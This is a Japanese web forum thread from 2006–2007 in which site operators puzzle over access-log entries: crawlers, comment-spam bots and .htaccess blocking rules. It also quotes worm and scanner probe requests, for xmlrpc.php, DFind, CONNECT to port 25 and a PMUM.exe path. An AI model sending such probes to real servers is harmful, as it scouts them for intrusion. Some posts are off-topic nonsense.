n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /blog/xmlsrv/xmlrpc.php HTTP/1.0" 404 216 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /blogtest/xmlsrv/xmlrpc.php HTTP/1.0" 404 220 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /b2/xmlsrv/xmlrpc.php HTTP/1.0" 404 214 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /b2evo/xmlsrv/xmlrpc.php HTTP/1.0" 404 217 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 214 "-" "-"
n1.210-188-228-11.mixi.jp - - [18/Apr/2006:20:15:54 +0900] "GET /phpgroupware/xmlrpc.php HTTP/1.0" 404 217 "-" "-"

なんだろ?

683 :バッカーです ◆KeuXjwWDdE :2006/04/20(木) 02:59:36 ID:???
xmlrpc.phpを狙うワーム(Linux/Lupper.wormとか)にmixi内のPCが感染したと考えるのが素直

684 :DNS未登録さん:2006/04/23(日) 15:32:12 ID:???
inktomisearch.comが意味不明な引数つけてGETしてくるんだけど
なんででしょ?
index.php?hoge
とか
index.php?i=y1111&server=hoge
とか

別にそれでも普通に見れるんだけど

685 :DNS未登録さん:2006/04/23(日) 19:07:03 ID:???
どこかでそういうリンクがあるんじゃないの?

686 :DNS未登録さん:2006/04/24(月) 22:52:51 ID:???
>>685
レスd

うちだけじゃなかったようで、こんなん出ました。

http://www.alltheweb.com/search?cat=web&cs=utf8&hits=50&q=i%3Dy1190%26server%3DSirius%26l%3Doffa+
http://www.alltheweb.com/search?cat=web&cs=utf8&hits=50&q=main%3Dview%26select%3Dw4%26server%3DCanopus
http://www.alltheweb.com/search?cat=web&cs=utf8&hits=50&q=main%3Dview%26select%3Dy9%26server%3DRigel+


 ・・(゚д゚)・・?

687 :DNS未登録さん:2006/04/25(火) 23:27:39 ID:Nc/mRxvX
GET /thisdoesnotexistahaha.php って何だろう?
http://www.google.co.jp/search?num=100&hl=ja&q=%22GET+%2Fthisdoesnotexistahaha.php%22

688 :DNS未登録さん:2006/04/26(水) 00:29:19 ID:???
存在しないよアハハ

689 :DNS未登録さん:2006/05/04(木) 10:23:28 ID:???
ここが参考になった。
http://www.webmasterworld.com/forum39/3836.htm

690 :DNS未登録さん:2006/05/15(月) 19:59:32 ID:???
サーバーログにwww.gigablast.comがあってこれをアクセス拒否したいのですが、
whoisでIP調べて.htaccessに
order allow,deny
allow from all
deny from 66.154.102.171
と記述したのですが、翌日以降もstatusコード200となっていて正常にアクセスしてきています。
どうすれば拒否出来ますか?

691 :DNS未登録さん:2006/05/15(月) 20:18:09 ID:???
gigablast.com
ではじけばいいじゃn

692 :DNS未登録さん:2006/05/15(月) 20:21:43 ID:???
これって何?

68.78.88.185 - - [15/May/2006:09:52:37 +0900] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 398 "-" "-"


693 :DNS未登録さん:2006/05/15(月) 22:02:59 ID:???
ぐぐれ
http://www.google.co.jp/search?q=%22w00tw00t.at.ISC.SANS.DFind%22

694 :DNS未登録さん:2006/05/15(月) 23:30:24 ID:???
ホスト名ではじくと負荷がかかる(らしい)のでIPアドレスではじきたいんです。
思うにホスト名が同じでもIPアドレスだけ変化しているんだと思うんです。
使っているIPアドレスの範囲ってどうやって調べればいいんでしょうか?


695 :DNS未登録さん:2006/05/16(火) 00:24:39 ID:???
ipでwhois

InfoRelay Online Systems, Inc. ASSERTIVE-66-154-100-0-22 (NET-66-154-100-0-1)
66.154.100.0 - 66.154.103.255
Gigablast, Inc. GIGABLAST-SJC-1 (NET-66-154-102-0-1)
66.154.102.0 - 66.154.103.255
ASSERTIVENET ASSERTIVENETWORKS (NET-66-154-96-0-1)
66.154.96.0 - 66.154.127.255

# ARIN WHOIS database, last updated 2006-05-14 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.



696 :DNS未登録さん:2006/05/16(火) 06:09:31 ID:???
>>693
当然先にぐぐっているが、誰がどういう意図で残したものかを解説しているところは見つからなかった。
単なる脆弱性さがしなら、こんなメッセージを残す意味ないでしょ?


697 :DNS未登録さん:2006/05/16(火) 09:03:24 ID:???
WebAlizerですが、特定のディレクトリへのアクセスはカウントしない方法はありますか?


698 :DNS未登録さん:2006/05/16(火) 19:23:35 ID:???
695ありがd

699 :DNS未登録さん:2006/05/18(木) 23:18:26 ID:???
>696
日本語の検索結果だけ見てる?

> 単なる脆弱性さがしなら、こんなメッセージを残す意味ないでしょ?
      ↑
ごめん。意味わからん。


700 :DNS未登録さん:2006/05/19(金) 19:42:07 ID:???
>>699
頭悪いんだな

701 :DNS未登録さん:2006/05/20(土) 00:01:34 ID:???
>>700
漏れも頭悪いんで解説して

702 :バッカーです ◆KeuXjwWDdE :2006/05/20(土) 00:23:15 ID:???
漏れ漏れも

703 :DNS未登録さん:2006/05/20(土) 01:16:24 ID:???
http://www.atlink.it/~conti/2006/03/04/w00tw00tatiscsansdfind-update/

脆弱性発見ツールだね。
といっても、攻撃するためのツールじゃなくて、
攻撃されないように自分の弱点を予め洗い出すためのツール。
だから明確な足跡を残すんだよ。隠す必要ないから。

704 :DNS未登録さん:2006/06/12(月) 06:11:49 ID:???
保守ってみる

705 :DNS未登録さん:2006/06/22(木) 23:23:57 ID:???
亀レス>>697
webalizer.conf で HideURL を設定すればいいんじゃない?

しかしまあ
力の限りアクセスしまくってくるプリフェッチャは( ゚д゚)コマル
数秒ディレイを設けてください。

706 :DNS未登録さん:2006/07/12(水) 09:58:48 ID:TdKm2eeX
awstats?config=www2
って指定することがようやく分かった。
マニュアルで見つけられなかった。
ところで、 awstats ってそれ自体には認証ないの?
しょぼいけど htpasswd でのBASIC認証でも掛けとくかな。

707 :DNS未登録さん:2006/07/13(木) 15:12:02 ID:???
>706
常に脆弱性が見つかっているawstatsに、認証を任せるのは無意味。
あえてapacheにやらせるべき。


708 :DNS未登録さん:2006/07/13(木) 16:07:18 ID:???
フォルダ名をパスワードみたいにしとけば良いんじゃないの?

709 :DNS未登録さん:2006/07/13(木) 17:34:11 ID:???
(゚д゚)?

710 :DNS未登録さん:2006/07/13(木) 17:43:42 ID:???
たしかにねー、何らかの文字を入力せにゃならんてことでは
BASIC認証と大差ない気がしないでもないけど、
どこかにリンクでも貼った日にはリファラが・・・・

711 :DNS未登録さん:2006/07/21(金) 06:35:28 ID:???
ログ見てて気付いたが、NAVER検索って終了した筈なのにボットは生きてるのか。
本国のボット…?

712 :DNS未登録さん:2006/07/23(日) 03:01:46 ID:???
Lunascape は favicon 取る時に USER_AGENT にゴミを吐くのを直して欲しいぞ。

713 :DNS未登録さん:2006/07/26(水) 12:25:39 ID:LUiQQ9TQ
多段proxyのログ解析に良いフリーソフトありまつか?

714 :DNS未登録さん:2006/07/26(水) 22:36:45 ID:???
さっきさらした画像の直リンクURLへのアクセスログ見てて思ったんだが、
IE6とか7ってURLのディレクトリ部分までをrefererに吐くのか?
それとも何かのツールなのか。
URLそのままrefererに入ってるのもあるなぁ・・・

715 :DNS未登録さん:2006/08/02(水) 10:26:12 ID:???
UA: Robo Crawler 6.4.5 (robocrawler@bb.softbank.co.jp)
について何か知ってる人いない?

716 :DNS未登録さん:2006/08/05(土) 23:59:44 ID:???
メールして聞いてみれば?

717 :DNS未登録さん:2006/08/06(日) 09:51:13 ID:???
Delivery Status Notification (Delay) x2
Delivery Status Notification (Failure)
ですた。

robots.txtにリクエストはあるが、
User-Agent: robocrawler
には反応せず

うちに来たのは
216.255.229.231
216.255.229.233

全てのファイル、リンク先を根こそぎクロールする
softbankを騙ってるような気が・・

718 :DNS未登録さん:2006/08/06(日) 11:56:31 ID:???
そのIPアドレスは日本テレコムに割り当てられているから
確かに禿んとこだよ。

719 :DNS未登録さん:2006/08/07(月) 00:15:46 ID:???
推測と事実を混同すんなよ。

720 :DNS未登録さん:2006/08/07(月) 03:53:34 ID:???
>>718
確かにwhoisでIDCにはなってるけどさ・・

721 :DNS未登録さん:2006/08/07(月) 21:54:13 ID:???
Naverだったりして・・・ あそこは Google を騙ったことすらあるからねぇ。

722 :DNS未登録さん:2006/08/08(火) 15:58:07 ID:+db7b8Uj
・巨人Naverの日本再上陸作戦--新兵器“韓国のGoogle”とは・・・ - CNET Japan
http://japan.cnet.com/column/korea/story/0,2000067066,20192148,00.htm
こんな記事があった。
安心したらダメだ、気をつけよう。
1noon って気持ち悪いボットだなと前から弾いてたが、お仲間だったのか…。

723 :DNS未登録さん:2006/08/11(金) 09:58:59 ID:???
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

こんなアホなUAを返してくる掲示板spammerがいた(笑)。
("User-Agent: "も含めたUAを名乗ってきている)

724 :DNS未登録さん:2006/08/11(金) 23:00:50 ID:???

SetEnvIfNoCase User-Agent "^user-agent" forbidden

<Files *>
order allow,deny
deny from env=forbidden
allow from all
</Files>

725 :DNS未登録さん:2006/09/17(日) 22:31:14 ID:4ce0rwz+
MSBlasterの亜種からのアクセスが未だに来るね。

060917214622 219.128.162.215 "GET / HTTP/1.1" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 403 56

いい加減駆除しろっての。

726 :DNS未登録さん:2006/09/17(日) 23:20:48 ID:???
報告すればいいじゃん。
おまい→ISP→感染ユーザー。

727 :DNS未登録さん:2006/09/18(月) 01:02:58 ID:???
Windows 98のサポートが終了したから心置きなくDenyできるのか。

728 :DNS未登録さん:2006/09/18(月) 11:45:16 ID:???
98使ってた人何に移動するんだろうね?軽量版linuxかな?

729 :DNS未登録さん:2006/09/18(月) 13:30:00 ID:???
>>725
そのIPアドレスは中国のだから、何言ってもムダだろう。

730 :DNS未登録さん:2006/09/18(月) 13:53:43 ID:???
わざと放置して、虚弱性残したままの鯖探してるのかもよw

731 :DNS未登録さん:2006/09/18(月) 15:25:39 ID:???
虚弱性じゃなくて脆弱性な。アリナミンで治るわけじゃないんだから。

732 :DNS未登録さん:2006/09/18(月) 17:59:26 ID:???
ちなみに読み方は「ぜいじゃくせい」な。
「きじゃくせい」でも「きょじゃくせい」でもないぞ。

733 :DNS未登録さん:2006/09/18(月) 20:16:22 ID:???
巨雀

734 :DNS未登録さん:2006/09/20(水) 19:39:48 ID:???
月危 弓弓 小生

735 :DNS未登録さん:2006/09/23(土) 15:42:27 ID:???
「ネットランナー」でオベンキョーしたのかもね。
http://takagi-hiromitsu.jp/diary/20060429.html


736 :DNS未登録さん:2006/09/25(月) 10:04:59 ID:???
虚弱性がアリナミンで治るかどうかも疑わしいがな

737 :DNS未登録さん:2006/09/25(月) 23:51:11 ID:???
まぁ、一時的に元気にはなるぞ。あくまで一時的にだが。

738 :DNS未登録さん:2006/09/26(火) 04:13:40 ID:???
ウィルスを駆除してもう大丈夫だ!って油断する奴が多いから
あながち間違いでもないような気がするわけだがw

739 :DNS未登録さん:2006/09/26(火) 22:16:28 ID:???
そういえば、一昔前は「ワクチン」という言い方が流行ったよな。

740 :DNS未登録さん:2006/09/27(水) 00:05:54 ID:???
>>739
ウイルスに感染したファイルからウイルスだけを取り除く/予防することが出来た
古き良き時代の話だな。今ではOSそのものの複雑化(主にWindows)とウイルスの
高度化のおかげでウイルスだけを取り除く/予防することはほぼ不可能なのが
当たり前になってしまい、従って「ワクチン(予防薬)」という呼び方もされなく
なってしまったんだよな。

741 :DNS未登録さん:2006/10/03(火) 00:12:27 ID:???
謎のUA 1.0はもうアクセスが少なくなったからどうでもいいといえばいいんだけど、3ヶ月前に作った
新しいファイルにアクセスしてきたもんだから、ちょっと驚いた。

パターンは相変わらず。
xxx.mie.ocn.ne.jp - - [02/Oct/2006:17:yy:zz +0900] "GET /~foo/bar.html HTTP/1.0" 200 abcd "-" "1.0"
xxx.mie.ocn.ne.jp - - [02/Oct/2006:17:yy:zz +0900] "GET /~foo/ HTTP/1.0" 200 abcd "-" "1.0"
xxx.mie.ocn.ne.jp - - [02/Oct/2006:17:yy:zz +0900] "GET / HTTP/1.0" 200 abcd "-" "1.0"




742 :DNS未登録さん:2006/10/18(水) 21:32:26 ID:???
>キーウォーカー、プロガーのプロファイリングを可能にする検索サービス
http://internet.watch.impress.co.jp/cda/news/2006/10/18/13655.html
気持ち悪いサービスを予防的に蹴っておこうと思うんだが、UA名とかわかる人いる?

743 :DNS未登録さん:2006/10/21(土) 12:01:15 ID:???
とりあえずipで予防線張っとくのはどう?

744 :DNS未登録さん:2006/10/21(土) 16:54:59 ID:???
それもやってみる。

745 :DNS未登録さん:2006/10/23(月) 03:15:07 ID:???
いったいどうやってIPアドレスを調べるというのだろう。

746 :DNS未登録さん:2006/10/28(土) 19:45:23 ID:???
ブログへのコメントスパムボットのUA名。
Jakarta Commons-HttpClient/*.**

同じくTBスパムボットのUA名。
TrackBack/*.**
tb_send/*.**

/のあとの、*.**の部分はバージョン(1.01とか、3.0とか)らしい数字。
tb_sendはネット上で公開されてるPerlの例文で提示されてるものを、スパマーが
そのまんま使ってるらしい。
tb_send/は日本語、TrackBack/ と Jakarta Commons-HttpClient/ は英文スパム。

747 :DNS未登録さん:2006/10/29(日) 04:25:08 ID:???
あー、そういや、Good Design! とか Nice Site!、Great Work! とだけ書いて
あとはURLをずらずら貼り付けていくスパマーがいるが、それを弾くには

SetEnvIfNoCase Range "bytes=0-0" forbidden
<Files *>
order allow,deny
deny from env=forbidden
</Files>

でいいことに最近気が付いた。

748 :DNS未登録さん:2006/10/29(日) 17:18:32 ID:???
そんな分かりやすそうなヘッダ吐いてたんだ

749 :DNS未登録さん:2006/11/16(木) 14:57:58 ID:???
逆引きできないIPが大量にログに残ってたんで調べてみると

OrgName: TREND MICRO INCORPORATED
OrgID: TREND-7
Address: 10101 N. De Anza Blvd,
City: Cupertino
StateProv: CA
PostalCode: 95014
Country: US
NetRange: 66.180.80.0 - 66.180.95.255

これって米トレンドマイクロの中の人がアクセスしてる?
それともFW製品の代理プロキシか何かかな…
コンテンツから考えて、アクセスがあるはずないんだけど…謎

750 :DNS未登録さん:2006/11/16(木) 18:13:49 ID:???
あ、それ、ウチにも来るよ。

その直後に同一URLへのまともなアクセスがあるから
>それともFW製品の代理プロキシか何かかな…
っぽいね。
ページに脅威がないかどうかチェックしてくれるサービスじゃないだろうか。

ちなみに、UAは
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
のはず。

751 :DNS未登録さん:2006/11/16(木) 21:04:37 ID:???
>>750
レスとうも。
UAは確かにそれです。
調べてみたら同一時刻か1秒後ぐらいに、本来のアクセスらしいのがありました。
何か鬱陶しいので、iptablesで弾こうか…

752 :DNS未登録さん:2006/11/17(金) 03:21:37 ID:???
でも、それ弾くと本来のアクセスに悪影響が出るんじゃないかなあ?
出ないかもしれないけど。

753 :DNS未登録さん:2006/11/18(土) 00:47:47 ID:???
言われてみればそうかも…
その代理プロキシ(?)がページのチェックに失敗したらどうなるのかな?
「脅威が発見されました!」となるかもね。

754 :NRV91KM652:2006/11/18(土) 09:26:50 ID:CIbLRJ1f
>>91ああ

755 :NRV91KM652:2006/11/18(土) 09:30:12 ID:CIbLRJ1f
DQNはスグにライバルを叩こうとする

756 :DNS未登録さん:2006/11/18(土) 09:31:02 ID:CIbLRJ1f
>>91

757 :NRV91KM652:2006/11/18(土) 11:01:08 ID:CIbLRJ1f
ああ

758 :NRV91KM652:2006/11/18(土) 16:32:51 ID:Vq04lh2J
klfgkvglfckjfcjこいrtjmrthyjfjkhf

759 :NRV91KM652:2006/11/18(土) 16:34:59 ID:Vq04lh2J
な、何でお前にくそ〜
ギコに〜くはぁ

760 :NRV91KM652:2006/11/18(土) 16:38:09 ID:Vq04lh2J
ドラクエ3で神龍を倒せません倒し方を教えて下さい。

761 :NRV91KM652:2006/11/18(土) 16:39:44 ID:Vq04lh2J
本当に教えて下さい

762 :NRV91KM652:2006/11/18(土) 16:41:33 ID:Vq04lh2J
ゾーマを倒したけど神龍が倒せません

763 :NRV91KM652:2006/11/18(土) 16:42:56 ID:Vq04lh2J
皆さん持ってますかドラクエ3を本当に持ってますか

764 :DNS未登録さん:2006/11/18(土) 18:05:07 ID:mr7RuZXw
オルゴデミーラ最終頑張っても配合できません
方法教えて下さい

765 :DNS未登録さん:2006/11/19(日) 19:19:12 ID:fCwayPDQ
ここで質問していいものかわからないのですが、聞いてもよかですか?
最近、トップページだけ見に来るへんな人がいるんですけど
時間はバラバラなんですが、とにかく定期的にトップページだけ
見に来るんです。悪さするわけじゃないけど、ログをみるとウインドウズじゃなく
Linux&ネスケで、だからって変ですが、何となく激しく不安です
かといって、IPで弾いたら機嫌損ねてクラッカーのスイッチ入っちゃうかもしれないし・・・
定期的にトップページだけ見に来る人は、何をしに来ているんでしょうか
相手が仮にクラッカーだという前提で可能性を教えてください
すげーへんな質問なのはわかってます

766 :DNS未登録さん:2006/11/19(日) 20:44:46 ID:f36OGSeS
前提がおかしいと思う。

767 :DNS未登録さん:2006/11/19(日) 21:37:24 ID:fCwayPDQ
おかしいすか
いや、そういう人があんまりいないから不気味なんですよ
だってトップページ見て即座に帰る人って、ページのコンテンツに興味があるとは
思えないじゃないですか
なのに定期的にトップページだけ覗きに来る
カウンターがあるわけでもないし何しにきてんねやろって感じなんすよ

768 :DNS未登録さん:2006/11/19(日) 21:38:04 ID:fCwayPDQ
おかしいすか
いや、そういう人があんまりいないから不気味なんですよ
だってトップページ見て即座に帰る人って、ページのコンテンツに興味があるとは
思えないじゃないですか
なのに定期的にトップページだけ覗きに来る
カウンターがあるわけでもないし何しにきてんねやろって感じなんすよ

769 :DNS未登録さん:2006/11/19(日) 21:43:37 ID:fCwayPDQ
おかしいすか
しかしですよ、毎回トップページだけ見て帰るような人が、ページの内容に興味があるとは
思えないじゃないすか
それなのに何度も何度も定期的にトップページにだけ訪れるって・・・
何しにきてはんねやろって思いません?
何か調べに来てるんだろうか、とか思っちゃいましたんで質問しました

770 :DNS未登録さん:2006/11/19(日) 21:44:45 ID:???
あ、すんません、なんで3連投になってるんだろう・・・

771 :DNS未登録さん:2006/11/19(日) 21:45:24 ID:???
GET / HTTP/1.1してオサラバなんてよくあることだ。きにするな。

772 :DNS未登録さん:2006/11/21(火) 05:41:41 ID:GHhnJzIl
質問させて下さい

最近、というか今AWStats65をインストールして
設定したんですが、これを限られた人間だけが
外部のPCから見るようにするには、どうしたら良いでしょうか?

アクセスしても


>Access forbidden!

>要求されたオブジェクトへのアクセス権がありません。
>読み込みが許可されていないか、
>サーバが読み込みに失敗したかでしょう。

と、まぁ当然なるのですが、何か解決方法がありますかね?
Linux自体最近触り始めたもんで、アホ過ぎる質問でしたら、すまんです

773 :DNS未登録さん:2006/11/21(火) 18:41:37 ID:???
apacheのエラーログがどうでてるか見ろ。

774 :DNS未登録さん:2006/11/21(火) 20:45:23 ID:???
>>772
IP認証によるアクセス制限
ttp://www.atmarkit.co.jp/flinux/rensai/apache09/apache09a.html

ユーザー認証によるアクセス制限
ttp://www.atmarkit.co.jp/flinux/rensai/apache10/apache10a.html

775 :DNS未登録さん:2006/11/21(火) 22:10:33 ID:???
atmarkitってインストールガイドとしては使えないよな。

776 :DNS未登録さん:2006/11/22(水) 03:29:48 ID:???
>>775
手を付ける前なら読む価値あるよ。
1ヶ月くらい繰り返し読んでイメージだけを頭に植え付ける。

777 :DNS未登録さん:2006/11/23(木) 08:07:49 ID:???
なんか方向性が間違ってないか?
>>772は「見えないから見えるようにしたい」と言っているのに
「見えなくする方法」ばかり教えても意味がないぞ。

778 :DNS未登録さん:2006/11/23(木) 14:14:02 ID:???
ヒント:これを限られた人間だけが外部のPCから見るようにするには

779 :DNS未登録さん:2006/11/23(木) 14:25:17 ID:???
お返しのヒント:アクセスしても Access forbidden! と、まぁ当然なるのですが、何か解決方法がありますかね?


780 :DNS未登録さん:2006/11/24(金) 23:33:46 ID:???
まぁ、まず最初に「誰にも見えない原因」を究明にして、
その後で「特定の人からだけ見えるようにする方法」を調べる、と
そういう順番で解決する必要があるわけだ、この人の場合。

781 :DNS未登録さん:2006/11/25(土) 00:07:22 ID:???
この人達は何をしたいんでしょうか…

"GET / HTTP/1.0" 403 198 "-" "check_http/1.89 (nagios-plugins 1.4.3c)"
"GET / HTTP/1.0" 403 198 "-" "Yamada-Search/0.21 (Windows NT/5.1; Build 2600; Service Pack 1)"

782 :DNS未登録さん:2006/11/25(土) 01:27:50 ID:???
ググればすぐに判るだろ?

783 :DNS未登録さん:2006/11/28(火) 22:52:27 ID:???
ヤマダサーチ…

784 :DNS未登録さん:2006/11/30(木) 08:12:44 ID:???
これって何?

CONNECT mx2.mail2000.com.tw:25 HTTP/1.0

785 :DNS未登録さん:2006/12/01(金) 08:11:33 ID:???
>>784
CONNECTメソッドくらい検索すればすぐに解ることだろうに。

786 :DNS未登録さん:2006/12/02(土) 14:04:13 ID:???
>>784
そもそもどこから持って来たログ?
25番ポート(SMTPポート)にHTTPでコネクトしようとすること自体がおかしいんだが。

787 :DNS未登録さん:2006/12/02(土) 14:14:48 ID:???
あ、コネクトの段階だとHTTPだろうがSMTPだろうが関係ないよな。
正確に言うと、CONNECTとHTTPがログの同じ行に現れること自体がおかしい、ということで。

788 :DNS未登録さん:2006/12/02(土) 14:19:16 ID:???
うああああ、HTTPにCONNECTというメソッドがあるんだな。知らなかった。
TCP/IPのconnectだと勘違いしていたよ。socketしてconnectして、の。

789 :DNS未登録さん:2006/12/02(土) 19:41:03 ID:???
HTTPトンネリングするとログに出てくるね。>CONNECT

ところで、最近nagios-pluginsがウゼェ。mod_rewriteで302にしてるけど。

790 :DNS未登録さん:2006/12/02(土) 19:53:10 ID:???
要するにCONNECTメソッド(主にhttps proxyに使うはずのものだが)をサポートした
http server (事実上のトンネル) かどうかをチェックしてるわけだな。

791 :DNS未登録さん:2006/12/08(金) 19:47:50 ID:???
061204123130 150.61.31.78 "GET /cgi-bin/PMUM/PMUM.exe HTTP/1.1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 404 240

なにこれ。スパム業者は氏ねよ。

792 :DNS未登録さん:2006/12/08(金) 21:15:50 ID:???
>>791
$ whois -h whois.nic.ad.jp 150.61.31.78

[ JPNIC database provides information regarding IP address and ASN. Its use ]
[ is restricted to network administration purposes. For further information, ]
[ use 'whois -h whois.nic.ad.jp help'. To only display English output, ]
[ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 150.61.0.0/16
b. [ネットワーク名] CANON-NET
f. [組織名] キヤノン株式会社
g. [Organization] Canon Inc.
m. [管理者連絡窓口] NT3234JP
n. [技術連絡担当者] HK10602JP
p. [ネームサーバ] ns1.canon.co.jp
p. [ネームサーバ] ns1.fine.ad.jp
p. [ネームサーバ] ns2.canon.co.jp
p. [ネームサーバ] ns3.canon.co.jp
[割当年月日] 1991/06/17
[返却年月日]
[最終更新] 2005/08/22 16:24:43(JST)

上位情報
----------
該当するデータがありません。

下位情報
----------
該当するデータがありません。

アハハハハハハハハハ(゚∀゚)ハハハハハハハ

793 :DNS未登録さん:2006/12/15(金) 20:54:12 ID:???
祭りと聞いて飛んできました

794 :DNS未登録さん:2006/12/15(金) 20:54:14 ID:???
祭りと聞いて飛んできました

795 :DNS未登録さん:2006/12/16(土) 14:16:24 ID:???
飛んで火に入る夏の蟲

796 :DNS未登録さん:2006/12/16(土) 20:31:26 ID:???
スパム対策のサイトに出入りしてると、たまにボットネットの存在を知らずに
社員=犯人だと思い込んで騒いでるアホがいて面白い。

797 :DNS未登録さん:2006/12/20(水) 03:03:08 ID:???
あと一般ISPのホスト名やIPアドレスにwhoisかけた結果を持ち出して
「NTTの社員の仕業だ!」「KDDIの社員だった!」と騒ぐやつとかね。

798 :DNS未登録さん:2007/01/16(火) 00:54:47 ID:???
>>791
それ普通のアクセスじゃないよな。

799 :DNS未登録さん:2007/01/17(水) 11:23:37 ID:???
>>791
そのパターンはウィルスかボットネットが他所のweb serverの脆弱性
を探しているように見える。しかし /cgi-bin/PMUM/PMUM.exe でぐぐ
ってもこのスレしか見つからない。

PMUM.exeでぐぐったらこのページを見つけた:
ttp://akisoftware.jp/pmsrv/pmsrv.html
SMTP/POP3 server and Webmail for Windows PMail Server

だそうな。PMUM.exeに未知の脆弱性があるのか、単純に
設定間違いで関係ないホストにアクセスしてしまったのか、
人の迷惑考えない馬鹿がどれくらい普及しているか探し
回っているとか。

まぁ気にする程の事ではないと思うが、PMail使っていな
ければね。


800 :DNS未登録さん:2007/01/29(月) 22:43:32 ID:TXFdgsfP
うちのBBSに悪質な荒らし書き込みが(始めて)あったんだけど、
こういうときに、小まめにabuse 宛に通報とかしたほうがいいんでしょうか

で、通報した場合、サーバの管理者って相手に注意するんでしょうか
その結果、更に逆恨みされるとか・・・そういう可能性ってあります?
かなりビビリですけど、経験談ある方、ご教授願います

801 :800:2007/01/29(月) 22:44:57 ID:???
あと、通報するときは書き込み時のサーバログを貼り付けるだけでいいんでしょうか
あとは荒らされたURLとか・・・?

802 :DNS未登録さん:2007/01/30(火) 18:52:20 ID:???
>>800
> うちのBBSに悪質な荒らし書き込みが(始めて)あったんだけど、
> こういうときに、小まめにabuse 宛に通報とかしたほうがいいんでしょうか

するかしないかは、おまいさんの判断次第。
その前に、その香具師が書き込んでいるIP アドレスが本物であるか
どうか調べる必要がある。
世の中には物好きというか馬鹿というか、公開proxyを晒している香
具師が居るので、そういったproxy経由で書き込まれた可能性がある。

ログを眺めているとなんとなくわかるものだが、わからなければその
IPアドレスを管理しているISPのお客様相談口などに、ログと書き込み
内容を伝えて、そちらのユーザが書いたものかどうか確認してもらえ。

whoisで海外のアドレスが出てきたら、大抵の場合そういったproxyの
可能性が高い。

> で、通報した場合、サーバの管理者って相手に注意するんでしょうか

マトモなISPならそのISPの約款の何れかに触れるので、その範囲で警告
してくれる。大抵のばあい「もう一回やったら契約解除するぞ」だな。

> その結果、更に逆恨みされるとか・・・そういう可能性ってあります?

もちろん。そりゃ人間の心理の問題だからね。技術でどうこうなるもん
じゃない。ここからは鯖管としての精神力が試される所。一方的な削除
はかえって祭りを呼び込む事になりかねない。ある程度マトモな書き込み
には馬鹿正直かつ丁寧に返事を「掲示板に」書く事。メール等ではその他
のユーザにやり取りが見えないので、掲示板に公開する事が大事。
ISPに通報するのは、最も悪質な奴のみで十分。特に2ちゃんねる絡みだと
一罰百戒になるので効果的。
#祭りスレッドを読んでいたら、通報した相手が泣き言書いていた :-)

> かなりビビリですけど、経験談ある方、ご教授願います

漏れの掲示板はある祭りが飛び火しそうになり、実際何人かの2ちゃんねる
ユーザによる嫌がらせ投稿をされたが、AAなど無意味な物は即刻削除、
その中で1番多く書いてきた相手をISPに通報、話が通じそうな相手には
馬鹿丁寧に返事を書いたおかげで防ぐ事ができた。おまけにその後ユーザー
数が増えたよ。


803 :800:2007/01/31(水) 14:54:16 ID:???
丁寧に教えてくれてありがとう。めっさ参考になりました。

804 :DNS未登録さん:2007/02/02(金) 06:06:37 ID:mnBLLn4k
質問。

アクセス解析のデーターで信用できるのは、
(1)IPアドレス
(2)リモートホスト
(3)タイムスタンプ

の3つだけで、OSやブラウザーは
自己申告なので、本当かウソか、わからない、
つまり信用できないデーターという理解でおk?
あと携帯だったら固体識別番号も信用できるデーターですか?

805 :DNS未登録さん:2007/02/02(金) 06:56:01 ID:???
>>804
信用できるか否かの分かれ目は難しい問題だな。

例えばIPアドレスについては、そのIPアドレスを持つノードから
HTTPリクエストが発せられたということ自体は事実だが、
実はそいつはproxyで、本当にリクエストを出した奴は
別にいる(が、そのことを見抜けない)という場合もあり得るので、
常に真の意味で「信用できる」ということにはならない。

>OSやブラウザーは自己申告なので、本当かウソか、わからない

これについても、そういう自己申告データがHTTPリクエストヘッダ中に
あったということ自体は事実だよね。

806 :DNS未登録さん:2007/02/02(金) 06:58:08 ID:???
>>805
プロキシーについてはまあ大丈夫です。
オープンプロキシーからのアクセスをはじくような設定はできるはずですから。
TORも同様です。

OSとブラウザーについては、信用できるとはかぎらないので、
ログを見ないでもいいかな?と思ったので。

807 :DNS未登録さん:2007/02/02(金) 07:05:36 ID:???
いったい何をしたいのか、最終的に実現したいことは何なのか、
それを最初に書いたほうがいいと思うぞ。
的確なアドバイスが欲しいなら。

808 :DNS未登録さん:2007/02/02(金) 12:00:14 ID:???
>>804
リモートホストがIPアドレスの逆引き結果のことなら信用はできない。
例えば、Googleとまったく関係ない人物/組織が
Googleとまったく関係ないIPアドレス(ブロック)に対して
逆引きをhogehoge.google.comとかに設定できるから。

あと逆引きしたらlocalhostとか.とかその他FQDNになってない文字列を
返してくるような設定の所もある。

809 :DNS未登録さん:2007/02/02(金) 19:45:27 ID:???
>>808
その場合、

hogehoge.google.com

をブラウザーに打ち込むと、どこのサーバーにつながるの?

810 :DNS未登録さん:2007/02/02(金) 19:57:17 ID:???
質問

一般的なプロバイダーのホームページスペースで
いまやっているのですが、ここってSSIでアクセス解析は
できるのですが、HTMLファイルならSSIを当然埋め込めるので
アクセス解析はできるのですが、jpgやCSSファイルの読み込みや
ダウンロードのログも見たいのですが、これらはSSIを埋め込むことが
できません。よってアクセス解析ができないと思うのですが、これらも
アクセス解析をしたいと思った場合、やはりアパッチのログを提供してくれる
会社にのりかえるしかないのでしょうか?

あるいは、レンタルサーバーとやらでも可能ですか?
これをやりたくて自宅サーバーを考えてました。

811 :DNS未登録さん:2007/02/02(金) 20:19:07 ID:???
>>810
